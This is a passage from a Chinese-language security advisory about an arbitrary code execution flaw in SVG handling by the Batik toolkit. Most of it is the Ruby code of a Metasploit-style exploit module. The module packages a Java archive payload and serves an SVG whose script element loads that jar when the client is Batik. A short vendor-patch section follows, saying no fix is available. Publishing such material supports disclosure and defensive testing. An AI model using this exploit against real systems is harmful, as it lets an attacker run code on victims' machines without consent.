Scalable Vector Graphics (SVG)任意代码执行漏洞(3)

jar  = p.encoded_jar
            paths.each do |path|
                1.upto(path.length - 1) do |idx|
                    full = path[0,idx].join("/") + "/"
                    if !(jar.entries.map{|e|e.name}.include?(full))
                        jar.add_file(full, '')
                    end
                end

fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb")
                data = fd.read(fd.stat.size)
                jar.add_file(path.join("/"), data)
                fd.close
            end

print_status("Sending jar payload")
            send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})

elsif agent =~ /Batik/
            svg = %Q|
            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
            <script type="application/java-archive" xlink:href="#{jar_uri}"/>
            <text>#{rand_text}</text>
            </svg>
            |

svg = svg.gsub(/\t\t\t/, '')
            print_status("Sending svg")
            send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})

else
            print_error("I don't know what the client is requesting: #{request.uri}")
        end
    end
end

建议：
--------------------------------------------------------------------------------
厂商补丁：

W3C
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：